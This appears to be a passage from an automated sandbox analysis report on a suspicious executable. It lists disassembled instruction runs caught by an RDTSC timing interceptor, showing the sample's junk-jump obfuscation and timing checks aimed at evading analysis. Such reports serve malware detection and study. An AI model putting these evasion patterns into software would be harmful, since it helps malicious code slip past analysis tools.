Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74708D5 second address: 74708D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74708D9 second address: 74708FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9665989DB8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74708FC second address: 7470941 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9665249A01h 0x00000009 sub ah, FFFFFFA6h 0x0000000c jmp 00007F9665249A01h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F9665249A03h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470988 second address: 7470999 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470999 second address: 7470A0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 pushfd 0x00000007 jmp 00007F9665249A03h 0x0000000c sbb ah, FFFFFFFEh 0x0000000f jmp 00007F9665249A09h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 js 00007F96D52B86E6h 0x0000001e jmp 00007F96652499FEh 0x00000023 mov eax, dword ptr [ebp-0Ch] 0x00000026 jmp 00007F9665249A00h 0x0000002b mov dword ptr [esi+04h], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F96652499FAh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470A0B second address: 7470A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470A0F second address: 7470A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470A15 second address: 7470A1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470A1B second address: 7470A55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+78h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9665249A07h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470A55 second address: 7470A6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665989DB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470A6D second address: 7470A83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ecx, 7A42A4BFh 0x00000012 mov di, cx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470A83 second address: 7470AB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, 40h 0x0000000f call 00007F9665989DB4h 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470AB4 second address: 7470AF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F9665249A01h 0x00000011 and ah, 00000026h 0x00000014 jmp 00007F9665249A01h 0x00000019 popfd 0x0000001a pushad 0x0000001b mov esi, 435F6E2Dh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470AF9 second address: 7470B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 pushad 0x00000008 pushfd 0x00000009 jmp 00007F9665989DB4h 0x0000000e or esi, 6BC119F8h 0x00000014 jmp 00007F9665989DABh 0x00000019 popfd 0x0000001a popad 0x0000001b lea eax, dword ptr [ebp-08h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F9665989DB0h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470B3E second address: 7470B88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 push edi 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F9665249A01h 0x00000015 sub esi, 3B1FBFF6h 0x0000001b jmp 00007F9665249A01h 0x00000020 popfd 0x00000021 jmp 00007F9665249A00h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470B88 second address: 7470B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665989DAEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470BF2 second address: 7470BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470BF6 second address: 7470BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470BFC second address: 7470C02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470C02 second address: 7470C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470C06 second address: 7470C0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470C0A second address: 7470C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F96D59F884Dh 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470C1C second address: 7470C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F9665249A04h 0x0000000a xor cx, 8298h 0x0000000f jmp 00007F96652499FBh 0x00000014 popfd 0x00000015 popad 0x00000016 pushfd 0x00000017 jmp 00007F9665249A08h 0x0000001c add esi, 42232CF8h 0x00000022 jmp 00007F96652499FBh 0x00000027 popfd 0x00000028 popad 0x00000029 mov eax, dword ptr [ebp-04h] 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F9665249A05h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470C8D second address: 7470CB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9665989DB7h 0x00000008 mov si, 7EFFh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esi+08h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470CB7 second address: 7470CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470CBB second address: 7470CBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470CBF second address: 7470CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470CC5 second address: 7470CFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9665989DB7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470CFB second address: 7470D4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b jmp 00007F96652499FEh 0x00000010 nop 0x00000011 jmp 00007F9665249A00h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F96652499FEh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470D4A second address: 7470D50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470D50 second address: 7470D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470D54 second address: 7470D9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F9665989DAEh 0x00000011 lea eax, dword ptr [ebp-18h] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushfd 0x00000018 jmp 00007F9665989DACh 0x0000001d or eax, 7EAB14C8h 0x00000023 jmp 00007F9665989DABh 0x00000028 popfd 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470D9B second address: 7470DAF instructions: 0x00000000 rdtsc 0x00000002 mov esi, 41498A3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dx, ax 0x0000000c popad 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470DAF second address: 7470DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470DB3 second address: 7470DC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470DC6 second address: 7470DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470DCC second address: 7470DE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470DE4 second address: 7470DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470DE8 second address: 7470DFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470E4F second address: 7470E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470E53 second address: 7470E57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470E57 second address: 7470E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470E5D second address: 7470E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470E63 second address: 7470E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470E67 second address: 7470E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470E6B second address: 7470EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a jmp 00007F9665989DB0h 0x0000000f js 00007F96D59F85D0h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F9665989DADh 0x0000001e sbb ax, 14C6h 0x00000023 jmp 00007F9665989DB1h 0x00000028 popfd 0x00000029 mov esi, 6D887577h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470EB9 second address: 7470F69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-14h] 0x0000000c jmp 00007F96652499FEh 0x00000011 mov ecx, esi 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F96652499FEh 0x0000001a sub ecx, 036A67C8h 0x00000020 jmp 00007F96652499FBh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007F9665249A08h 0x0000002c sbb eax, 2AD56A28h 0x00000032 jmp 00007F96652499FBh 0x00000037 popfd 0x00000038 popad 0x00000039 mov dword ptr [esi+0Ch], eax 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007F9665249A04h 0x00000043 sub ch, FFFFFF88h 0x00000046 jmp 00007F96652499FBh 0x0000004b popfd 0x0000004c push esi 0x0000004d mov al, bl 0x0000004f pop esi 0x00000050 popad 0x00000051 mov edx, 775606ECh 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F96652499FAh 0x0000005d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470F69 second address: 7470FB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b jmp 00007F9665989DAFh 0x00000010 lock cmpxchg dword ptr [edx], ecx 0x00000014 pushad 0x00000015 mov cx, 0FEBh 0x00000019 mov ecx, 57A5BFC7h 0x0000001e popad 0x0000001f pop edi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F9665989DB9h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470FB4 second address: 7470FEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 mov dh, ECh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test eax, eax 0x0000000c pushad 0x0000000d mov edi, ecx 0x0000000f pushfd 0x00000010 jmp 00007F96652499FCh 0x00000015 xor ch, 00000008h 0x00000018 jmp 00007F96652499FBh 0x0000001d popfd 0x0000001e popad 0x0000001f jne 00007F96D52B80F2h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470FEC second address: 7470FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470FF0 second address: 7470FF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7470FF6 second address: 7471098 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d popad 0x0000000e mov eax, dword ptr [esi] 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F9665989DB4h 0x00000017 xor si, BAC8h 0x0000001c jmp 00007F9665989DABh 0x00000021 popfd 0x00000022 movzx esi, dx 0x00000025 popad 0x00000026 mov dword ptr [edx], eax 0x00000028 jmp 00007F9665989DABh 0x0000002d mov eax, dword ptr [esi+04h] 0x00000030 pushad 0x00000031 mov ecx, 36597F4Bh 0x00000036 mov dl, al 0x00000038 popad 0x00000039 mov dword ptr [edx+04h], eax 0x0000003c pushad 0x0000003d pushad 0x0000003e call 00007F9665989DAFh 0x00000043 pop ecx 0x00000044 mov eax, edx 0x00000046 popad 0x00000047 mov ax, bx 0x0000004a popad 0x0000004b mov eax, dword ptr [esi+08h] 0x0000004e jmp 00007F9665989DB7h 0x00000053 mov dword ptr [edx+08h], eax 0x00000056 pushad 0x00000057 mov cl, EFh 0x00000059 movsx edx, si 0x0000005c popad 0x0000005d mov eax, dword ptr [esi+0Ch] 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471098 second address: 747109C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747109C second address: 74710A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74710A2 second address: 74710E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F96652499FAh 0x00000009 adc ch, 00000048h 0x0000000c jmp 00007F96652499FBh 0x00000011 popfd 0x00000012 mov si, 6FBFh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [edx+0Ch], eax 0x0000001c jmp 00007F9665249A02h 0x00000021 mov eax, dword ptr [esi+10h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov esi, edi 0x00000029 mov cx, bx 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74710E7 second address: 747110E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+10h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9665989DAAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747110E second address: 7471114 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471114 second address: 74711D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9665989DACh 0x00000009 jmp 00007F9665989DB5h 0x0000000e popfd 0x0000000f mov ecx, 1191D957h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [esi+14h] 0x0000001a jmp 00007F9665989DAAh 0x0000001f mov dword ptr [edx+14h], eax 0x00000022 jmp 00007F9665989DB0h 0x00000027 mov eax, dword ptr [esi+18h] 0x0000002a pushad 0x0000002b mov bx, cx 0x0000002e popad 0x0000002f mov dword ptr [edx+18h], eax 0x00000032 pushad 0x00000033 jmp 00007F9665989DB5h 0x00000038 pushfd 0x00000039 jmp 00007F9665989DB0h 0x0000003e xor al, FFFFFF88h 0x00000041 jmp 00007F9665989DABh 0x00000046 popfd 0x00000047 popad 0x00000048 mov eax, dword ptr [esi+1Ch] 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e pushfd 0x0000004f jmp 00007F9665989DABh 0x00000054 sub si, AECEh 0x00000059 jmp 00007F9665989DB9h 0x0000005e popfd 0x0000005f movzx eax, dx 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74711D9 second address: 7471205 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96652499FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+1Ch], eax 0x0000000c jmp 00007F9665249A00h 0x00000011 mov eax, dword ptr [esi+20h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 mov eax, ebx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471205 second address: 7471250 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+20h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edi, si 0x00000012 pushfd 0x00000013 jmp 00007F9665989DB6h 0x00000018 adc ecx, 6695E738h 0x0000001e jmp 00007F9665989DABh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471250 second address: 7471256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471256 second address: 747125A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747125A second address: 747125E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747125E second address: 74712DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+24h] 0x0000000b jmp 00007F9665989DB7h 0x00000010 mov dword ptr [edx+24h], eax 0x00000013 jmp 00007F9665989DB6h 0x00000018 mov eax, dword ptr [esi+28h] 0x0000001b pushad 0x0000001c push ecx 0x0000001d pushad 0x0000001e popad 0x0000001f pop edx 0x00000020 call 00007F9665989DB8h 0x00000025 mov dl, al 0x00000027 pop edx 0x00000028 popad 0x00000029 mov dword ptr [edx+28h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F9665989DB9h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74712DB second address: 7471336 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [esi+2Ch] 0x0000000c pushad 0x0000000d mov bl, ch 0x0000000f popad 0x00000010 mov dword ptr [edx+2Ch], ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F9665249A07h 0x0000001c sbb ch, FFFFFFDEh 0x0000001f jmp 00007F9665249A09h 0x00000024 popfd 0x00000025 movzx eax, di 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471336 second address: 7471353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665989DB9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471353 second address: 7471365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [esi+30h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471365 second address: 747137B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747137B second address: 7471381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471381 second address: 7471385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471385 second address: 7471389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
